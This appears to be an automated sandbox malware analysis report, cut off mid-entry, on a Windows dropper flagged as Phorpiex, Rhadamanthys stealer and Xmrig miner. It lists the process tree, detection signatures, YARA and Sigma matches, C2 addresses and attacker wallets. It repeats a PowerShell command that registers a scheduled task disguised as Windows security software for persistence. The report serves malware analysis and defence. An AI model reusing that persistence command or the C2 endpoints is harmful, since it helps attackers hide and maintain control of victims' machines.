Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
f5TWdT5EAc.exe

Overview

General Information

Sample name:f5TWdT5EAc.exe
renamed because original name is a hash value
Original sample name:b992a18f00c902840fcd2bb93223a8cd58d0da1d9e142a90523931aa3f140276.exe
Analysis ID:1569290
MD5:001c8845e2489435657b200199b369f8
SHA1:1891627447cdb5bdcb50e39987084d112923a155
SHA256:b992a18f00c902840fcd2bb93223a8cd58d0da1d9e142a90523931aa3f140276
Tags:exeuser-adrian__luca
Infos:

Detection

Phorpiex, RHADAMANTHYS, Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Phorpiex
Yara detected RHADAMANTHYS Stealer
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to check if Internet connection is working
Contains functionality to detect sleep reduction / modifications
Detected Stratum mining protocol
Drops executables to the windows directory (C:\Windows) and starts them
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking mutex)
Found hidden mapped module (file has been removed from disk)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses Register-ScheduledTask to add task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Connects to several IPs in different countries
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • f5TWdT5EAc.exe (PID: 7420 cmdline: "C:\Users\user\Desktop\f5TWdT5EAc.exe" MD5: 001C8845E2489435657B200199B369F8)
    • 34D7.exe (PID: 7608 cmdline: "C:\Users\user\AppData\Local\Temp\34D7.exe" MD5: 08DAFE3BB2654C06EAD4BB33FB793DF8)
      • 896429707.exe (PID: 7668 cmdline: C:\Users\user\AppData\Local\Temp\896429707.exe MD5: 0C883B1D66AFCE606D9830F48D69D74B)
        • sysnldcvmr.exe (PID: 7744 cmdline: C:\Windows\sysnldcvmr.exe MD5: 0C883B1D66AFCE606D9830F48D69D74B)
          • 1171111125.exe (PID: 8016 cmdline: C:\Users\user\AppData\Local\Temp\1171111125.exe MD5: 323CB4364490F83204B51B0F7F3766F4)
            • 2779421088.exe (PID: 8088 cmdline: C:\Users\user\AppData\Local\Temp\2779421088.exe MD5: BD0CAD52FD3A6537CC7AF21852619340)
              • svchost.exe (PID: 8108 cmdline: "C:\Windows\System32\svchost.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
                • fontdrvhost.exe (PID: 5444 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
                  • WerFault.exe (PID: 6788 cmdline: C:\Windows\system32\WerFault.exe -u -p 5444 -s 136 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
          • 78476062.exe (PID: 8160 cmdline: C:\Users\user\AppData\Local\Temp\78476062.exe MD5: 96509AB828867D81C1693B614B22F41D)
            • 2688734187.exe (PID: 2652 cmdline: C:\Users\user\AppData\Local\Temp\2688734187.exe MD5: 13B26B2C7048A92D6A843C1302618FAD)
          • 640832494.exe (PID: 4468 cmdline: C:\Users\user\AppData\Local\Temp\640832494.exe MD5: 84897CA8C1AA06B33248956AC25EC20A)
          • 1657630034.exe (PID: 5420 cmdline: C:\Users\user\AppData\Local\Temp\1657630034.exe MD5: 77C5EB90118287F666886FC34210C176)
          • 2910625892.exe (PID: 1852 cmdline: C:\Users\user\AppData\Local\Temp\2910625892.exe MD5: 69A5D3C6E993B5A1BAFACF806647DF7D)
            • WerFault.exe (PID: 1232 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1852 -s 1332 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • sysnldcvmr.exe (PID: 8000 cmdline: "C:\Windows\sysnldcvmr.exe" MD5: 0C883B1D66AFCE606D9830F48D69D74B)
  • svchost.exe (PID: 2660 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 2744 cmdline: C:\Windows\system32\WerFault.exe -pss -s 456 -p 5444 -ip 5444 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • WerFault.exe (PID: 912 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1852 -ip 1852 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 5372 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • powershell.exe (PID: 7296 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • winupsecvmgr.exe (PID: 2960 cmdline: "C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe" MD5: 13B26B2C7048A92D6A843C1302618FAD)
    • conhost.exe (PID: 4828 cmdline: C:\Windows\System32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dwm.exe (PID: 3728 cmdline: C:\Windows\System32\dwm.exe MD5: 5C27608411832C5B39BA04E33D53536C)
  • powershell.exe (PID: 2024 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 2096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 4960 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 2656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 7980 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 6772 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • winupsecvmgr.exe (PID: 3820 cmdline: "C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe" MD5: 13B26B2C7048A92D6A843C1302618FAD)
  • powershell.exe (PID: 3464 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 3332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
PhorpiexProofpoint describes Phorpiex/Trik as a SDBot fork (thus IRC-based) that has been used to distribute GandCrab, Pushdo, Pony, and coinminers. The name Trik is derived from PDB strings.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.phorpiex
NameDescriptionAttributionBlogpost URLsLink
RhadamanthysAccording to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
  • Sandworm
https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
{"C2 url": ["http://185.215.113.66/", "http://91.202.233.141/"], "Wallet": ["15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC", "1BzmrjmKPKSR2hH5BeJySfiVA676E8DYaK", "lskaj7asu8rwp4p9kpdqebnqh6kzyuefzqjszyd5w", "ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp", "zil19delrukejtr306u0s7ludxrwk434jcl6ghpng3", "zncBgwqwqquPLHrM4ozrtr3LPyFuNVemy4v", "cro1xq0gkfldclds7y7fa2x6x25zu7ttnxxkjs66gf", "erd1hwcnscv0tldljl68upajgfqrcrmtznth4n6ee46le43cqpe5tatqw96dnx", "kava1r9xek0h0vkfra44lg3rp07teh9elxg2n6vsdzn", "inj1e2g9nyfjcnvgjpaa3czx2spgf2jx3gp4gk0nl9", "osmo125f3mw4xd9htpsq4zj5w5ezm5gags37y6pnhx3", "one1mnk7lk2506r0ewvr7zgwfuyt7ahvngwqedka3x", "3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc", "3ESHude8zUHksQg1h6hHmzY79BS36L91Yn", "DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA", "DsWwjQcpgo8AoFYvFnLrwFpcx8wgjSYLexe", "t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh", "terra1mw3dhwak2qe46drv4g7lvgwn79fzm8nr0htdq5", "thor1tdexg3v738xg9n289d6586frflkkcxxdgtauur", "tz1ZUNuZkWjdTt597axUcyZ5kFRtUZmUKuG2", "stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj", "stride125f3mw4xd9htpsq4zj5w5ezm5gags37y33qmy0", "sei125f3mw4xd9htpsq4zj5w5ezm5gags37ylk33kz", "sys1q0zg3clqajs04p2yhkgf96nf4hmup9mdr8l38u6", "bnb1msyt0djx4ecspfxg5en0ye465kg3kmv9utzml2", "bc1ppypcmu3684n648gyj62gjp2rw0xy7w3vwfamatlg29ajp4z52desafa0sr", "bc1qc9edl4hzl9jyt8twdad3zjeh2df2znq96tdezd", "btg1qwg85kf0r3885a82wtld053fy490lm2q2gemgpy", "GBQJMXYXPRIWFMXIFJR35ZB7LRKMB4PHCIUAUFR3TKUL6RDBZVLZEUJ3", "Gcrx8cK7ffKLaPJwiYHQrgi6pFTLbJsBPV", "B62qpDfv86fUZc4ntrYJL6eFJZajjNKRcBuW5iPbcLNkiPekLkV8NdA", "BKyTYg4eZC9NCzcL8M3hcUmDhCnBJrSScH", "ronin:a77fa3ea6e09a5f3fbfcb2a42fe21b5cf0ecdd17", "bitcoincash:qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r", "cosmos125f3mw4xd9htpsq4zj5w5ezm5gags37yj6q8sr", "addr1qxlwyj95fk9exqf55tdknx49e5443nr925tajatrdqpp8djla7u9jhswc3dk39se79f9zhwwq2ca95er3mylm48wyalqr62dmg", "nano_3p8stz4wqicgda1g3ifd48girzd5u74is8sdqq99tkuuz1b96wjwbc7yrmnb"]}
{"C2 url": "https://92.255.85.66:5188/0f4102eec0fccd80452e/kh4wg7np.u1t0f"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmpMacOS_Cryptominer_Xmrig_241780a1unknownunknown
      • 0x4cb268:$a1: mining.set_target
      • 0x4c6a48:$a2: XMRIG_HOSTNAME
      • 0x4c8540:$a3: Usage: xmrig [OPTIONS]
      • 0x4c6a20:$a4: XMRIG_VERSION
      C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmpMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
      • 0x4d1241:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
      C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmpMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
      • 0x4d17a0:$s1: %s/%s (Windows NT %lu.%lu
      • 0x4d1fc8:$s3: \\.\WinRing0_
      • 0x4ca4c8:$s4: pool_wallet
      • 0x4c62d0:$s5: cryptonight
      • 0x4c62e0:$s5: cryptonight
      • 0x4c62f0:$s5: cryptonight
      • 0x4c6300:$s5: cryptonight
      • 0x4c6318:$s5: cryptonight
      • 0x4c6328:$s5: cryptonight
      • 0x4c6338:$s5: cryptonight
      • 0x4c6350:$s5: cryptonight
      • 0x4c6360:$s5: cryptonight
      • 0x4c6378:$s5: cryptonight
      • 0x4c6390:$s5: cryptonight
      • 0x4c63a0:$s5: cryptonight
      • 0x4c63b0:$s5: cryptonight
      • 0x4c63c0:$s5: cryptonight
      • 0x4c63d8:$s5: cryptonight
      • 0x4c63f0:$s5: cryptonight
      • 0x4c6400:$s5: cryptonight
      • 0x4c6410:$s5: cryptonight
      SourceRuleDescriptionAuthorStrings
      0000000A.00000003.1606124598.00000000027F0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
        0000000A.00000002.1704824267.0000000002FA0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
          0000000A.00000003.1608329177.0000000004EC0000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            00000009.00000003.1602277553.0000000000CF0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
              0000002F.00000002.3552448433.00007FF7A1F0B000.00000004.00000001.01000000.00000015.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                Click to see the 13 entries
                SourceRuleDescriptionAuthorStrings
                9.3.2779421088.exe.35a0000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  9.3.2779421088.exe.3380000.6.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                    10.3.svchost.exe.50e0000.7.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                      10.3.svchost.exe.50e0000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                        10.3.svchost.exe.4ec0000.6.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                          Click to see the 32 entries

                          System Summary

                          barindex
                          Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }, ProcessId: 7296, ProcessName: powershell.exe
                          Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }, ProcessId: 7296, ProcessName: powershell.exe
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\2779421088.exe, ParentImage: C:\Users\user\AppData\Local\Temp\2779421088.exe, ParentProcessId: 8088, ParentProcessName: 2779421088.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 8108, ProcessName: svchost.exe
                          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\sysnldcvmr.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\896429707.exe, ProcessId: 7668, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings
                          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate 